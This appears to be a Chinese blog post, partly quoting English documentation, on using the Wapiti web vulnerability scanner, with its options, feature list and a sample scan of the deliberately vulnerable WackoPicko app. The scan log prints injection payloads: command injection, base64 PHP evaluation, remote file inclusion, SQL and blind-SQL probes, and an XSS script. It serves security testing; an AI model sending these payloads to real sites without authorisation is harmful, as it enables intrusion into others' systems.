Wapiti 是一个基于命令行单Web漏洞扫描器,通过给目标站点发送 GET 和 POST 请求查找如下漏洞: (http://wapiti.sourceforge.net/):
- File disclosure
- 数据库注入
- XSS (跨站脚本)
- Command execution detection
- CRLF injection
- XXE (XML eXternal Entity) injection
- Use of known potentially dangerous files
- Weak .htaccess configurations that can be bypassed
- 包含敏感信息的备份文件 (source code disclosure)
这篇文字,讨论如何利用 Wapiti 进行测试应用漏洞单发现和扫描报告的生成
实践
- 命令行调用 Wapiti:
作者:半个王国
链接:https://www.jianshu.com/p/d550d7b820a9
上述方式有问题,最新版命令已经改变:
Usage: wapiti [options] 可选参数: -h, --help 显示此帮助消息并退出 -u URL, --url URL 定义扫描范围的基础URL 默认扫描范围是folder --scope {page, folder, domain, url, punk} 设置扫描范围 -m MODULES_LIST, --module MODULES_LIST 加载模块列表 --list-modules 列出Wapiti攻击模块并退出 -l LEVEL, --level LEVEL 设置攻击等级 -p PROXY_URL, --proxy PROXY_URL 设置HTTP(S)代理 支持HTTP(S), SOCKS --tor 使用Tor监听器 (127.0.0.1:9050) -a CREDENTIALS, --auth-cred CREDENTIALS 设置HTTP认证凭据 --auth-type {basic, digest, kerberos, ntlm} 设置认证类型 -c COOKIE_FILE, --cookie COOKIE_FILE 设置json格式的Cookie文件 --skip-crawl 不恢复之前会话记录的扫描进程 --resume-crawl 即使先前曾进行过某些已停止的攻击也可以恢复扫描进程 --flush-attacks 放弃当前会话的攻击历史和漏洞信息 --flush-session 放弃所有之前发现的当前目标的所有信息包括爬取的URL和漏洞等 --store-session PATH 存储攻击历史记录和会话数据的目录 -s URL, --start URL 添加起始扫描URL -x URL, --exclude URL 添加要排除的URL -r PARAMETER, --remove PARAMETER 删除URL中的给定的参数 --skip PARAMETER 不攻击给定的参数 -d DEPTH, --depth DEPTH 设置扫描深度 --max-links-per-page MAX 设置扫描范围内每一页面提取的链接数 --max-files-per-dir MAX 设置每一目录探索的页面数 --max-scan-time MINUTES 设置扫描持续时间float分钟数 --max-parameters MAX 拥有超过最大输入参数的URL和表单在攻击前会被删除 -S FORCE, --scan-force FORCE 减少扫描和攻击的URL的简单办法 可选值: paranoid, sneaky, polite, normal, aggressive, insane -t SECONDS, --timeout SECONDS 设置请求超时时间 -H HEADER, --header HEADER 设置每次请求的首部 -A AGENT, --user-agent AGENT 设置每次请求的User-Agent --verify-ssl {0, 1} 是否检查SSL 默认不检查 --color 使用颜色美化输出 -v LEVEL, --verbose LEVEL 设置详细度 (0: quiet, 1: normal, 2: verbose) -f FORMAT, --format FORMAT 设置输出格式 支持: json, html(default), txt, openvas, vulneranet, xml -o OUPUT_PATH, --output OUPUT_PATH 输出文件或目录 --external-endpoint EXTERNAL_ENDPOINT_URL Url serving as endpoint for target --internal-endpoint INTERNAL_ENDPOINT_URL Url serving as endpoint for attacker --endpoint ENDPOINT_URL Url serving as endpoint for both attacker and target --no-bugreport 当攻击模块失败时不发送Bug报告 --version 打印程序版本号
What's new in Wapiti 3.0.3 ? Take a look here.
Wapiti can detect the following vulnerabilities :
- File disclosure (Local and remote include/require, fopen, readfile...)
- Database Injection (PHP/JSP/ASP SQL Injections and XPath Injections)
- XSS (Cross Site Scripting) injection (reflected and permanent)
- Command Execution detection (eval(), system(), passtru()...)
- CRLF Injection (HTTP Response Splitting, session fixation...)
- XXE (XML External Entity) injection
- SSRF (Server Side Request Forgery)
- Use of know potentially dangerous files (thanks to the Nikto database)
- Weak .htaccess configurations that can be bypassed
- Presence of backup files giving sensitive information (source code disclosure)
- Shellshock (aka Bash bug)
- Open Redirects
- Uncommon HTTP methods that can be allowed (PUT)
General features
- Generates vulnerability reports in various formats (HTML, XML, JSON, TXT...).
- Can suspend and resume a scan or an attack (session mechanism using sqlite3 databases).
- Can give you colors in the terminal to highlight vulnerabilities.
- Different levels of verbosity.
- Fast and easy way to activate/deactivate attack modules.
- Adding a payload can be as easy as adding a line to a text file.
Browsing features
- Support HTTP, HTTPS and SOCKS5 proxies.
- Authentication on the target via several methods : Basic, Digest, Kerberos or NTLM.
- Ability to restrain the scope of the scan (domain, folder, page, url).
- Automatic removal of one or more parameters in URLs.
- Multiple safeguards against scan endless-loops (for example, limit of values for a parameter).
- Possibility to set the first URLs to explore (even if not in scope).
- Can exclude some URLs of the scan and attacks (eg: logout URL).
- Import of cookies (get them with the wapiti-getcookie tool).
- Can activate / deactivate SSL certificates verification.
- Extract URLs from Flash SWF files.
- Try to extract URLs from javascript (very basic JS interpreter).
- HTML5 aware (understand recent HTML tags).
- Several options to control the crawler behavior and limits.
- Skipping some parameter names during attack.
- Setting a maximum time for the scan process.
- Adding some custom HTTP headers or setting a custom User-Agent.
看官方的示例报告就知道是如何支持cookie和用户名、密码的扫描了:
Hello,
Here is a really fast tutorial on Wapiti and Wapiti-getcookie usage to show how to login to a website to retrieve cookies
then use the generated cookie file to launch a Wapiti scan.
First, I use wapiti-getcookie to login in the restricted area and get the cookie in cookies.json :
bash-4.2$ wapiti-getcookie -u http://wackopicko/users/login.php -c cookies.json
<Cookie PHPSESSID=aofe1utktsh6q4blip8nr9820lksehjf0tr3019vm6bq8v1ca6d1 for wackopicko/>
Choose the form you want to use or enter 'q' to leave :
0) GET http://wackopicko/pictures/search.php?query=&x=1&y=1 (0)
1) POST http://wackopicko/users/login.php (0)
data: username=&password=
Enter a number : 1
Please enter values for the following form:
url = http://wackopicko/users/login.php
username: wanda
password: wanda
<Cookie PHPSESSID=aofe1utktsh6q4blip8nr9820lksehjf0tr3019vm6bq8v1ca6d1 for wackopicko/>
It can also be done with wapiti-getcookie this way (if you have all necessary informations about the form) :
wapiti-getcookie -u http://wackopicko/users/login.php -c cookies.json -d "username=wanda&password=wanda"
Then, I scan the vulnerable website using the cookie and excluding the logout script :
bash-4.2$ wapiti -u http://wackopicko/ -x http://wackopicko/users/logout.php -c cookies.json
__ __ .__ __ .__________
/ / \_____ ______ |__|/ |_|__\_____
// /\__ \____ | __ | _(__ <
/ / __ | |_> > || | | |/
\__/ / (____ / __/|__||__| |__/______ /
/ /|__| /
Wapiti-3.0.0 (wapiti.sourceforge.net)
[*] Saving scan state, please wait...
Note
========
This scan has been saved in the file /home/devloop/.wapiti/scans/wackopicko_folder_30e1d821.db
[*] Wapiti found 41 URLs and forms during the scan
[*] Loading modules:
mod_crlf, mod_exec, mod_file, mod_sql, mod_xss, mod_backup, mod_htaccess, mod_blindsql, mod_permanentxss, mod_nikto, mod_delay, mod_buster, mod_shellshock
[*] Launching module exec
---
Received a HTTP 500 error in http://wackopicko/admin/index.php
Evil request:
GET /users/WackoPicko/website/admin/index.php?page=%3Benv HTTP/1.1
Host: wackopicko
---
---
PHP evaluation in http://wackopicko/admin/index.php via injection in the parameter page
Evil request:
GET /users/WackoPicko/website/admin/index.php?page=data%3A%3Bbase64%2CPD9waHAgZWNobyAndzRwMXQxJywnX2V2YWwnOyA%2FPg%3D%3D HTTP/1.1
Host: wackopicko
---
---
Received a HTTP 500 error in http://wackopicko/admin/index.php
Evil request:
POST /users/WackoPicko/website/admin/index.php?page=%3Benv HTTP/1.1
Host: wackopicko
Referer: http://wackopicko/admin/index.php?page=login
Content-Type: application/x-www-form-urlencoded
adminname=default&password=letmein
---
---
PHP evaluation in http://wackopicko/admin/index.php via injection in the parameter page
Evil request:
POST /users/WackoPicko/website/admin/index.php?page=data%3A%3Bbase64%2CPD9waHAgZWNobyAndzRwMXQxJywnX2V2YWwnOyA%2FPg%3D%3D HTTP/1.1
Host: wackopicko
Referer: http://wackopicko/admin/index.php?page=login
Content-Type: application/x-www-form-urlencoded
adminname=default&password=letmein
---
[*] Launching module file
---
Remote inclusion vulnerability in http://wackopicko/admin/index.php via injection in the parameter page
Evil request:
GET /users/WackoPicko/website/admin/index.php?page=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: wackopicko
---
---
Remote inclusion vulnerability in http://wackopicko/admin/index.php via injection in the parameter page
Evil request:
POST /users/WackoPicko/website/admin/index.php?page=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: wackopicko
Referer: http://wackopicko/admin/index.php?page=login
Content-Type: application/x-www-form-urlencoded
adminname=default&password=letmein
---
[*] Launching module sql
---
Received a HTTP 500 error in http://wackopicko/admin/index.php
Evil request:
GET /users/WackoPicko/website/admin/index.php?page=%C2%BF%27%22%28 HTTP/1.1
Host: wackopicko
---
---
Received a HTTP 500 error in http://wackopicko/admin/index.php
Evil request:
POST /users/WackoPicko/website/admin/index.php?page=%C2%BF%27%22%28 HTTP/1.1
Host: wackopicko
Referer: http://wackopicko/admin/index.php?page=login
Content-Type: application/x-www-form-urlencoded
adminname=default&password=letmein
---
[*] Launching module xss
---
XSS vulnerability in http://wackopicko/pictures/search.php via injection in the parameter query
Evil request:
GET /users/WackoPicko/website/pictures/search.php?query=%22%2F%3E%3Cscript%3Ealert%28%27wj6bncic12%27%29%3C%2Fscript%3E&x=1&y=1 HTTP/1.1
Host: wackopicko
Referer: http://wackopicko/
---
[*] Launching module blindsql
---
Received a HTTP 500 error in http://wackopicko/admin/index.php
Evil request:
GET /users/WackoPicko/website/admin/index.php?page=sleep%287%29%231 HTTP/1.1
Host: wackopicko
---
---
Received a HTTP 500 error in http://wackopicko/admin/index.php
Evil request:
POST /users/WackoPicko/website/admin/index.php?page=sleep%287%29%231 HTTP/1.1
Host: wackopicko
Referer: http://wackopicko/admin/index.php?page=login
Content-Type: application/x-www-form-urlencoded
adminname=default&password=letmein
---
[*] Launching module permanentxss
Report
------
A report has been generated in the file /home/devloop/.wapiti/generated_report
Open /home/devloop/.wapiti/generated_report/wackopicko_12292017_1342.html with a browser to see this report.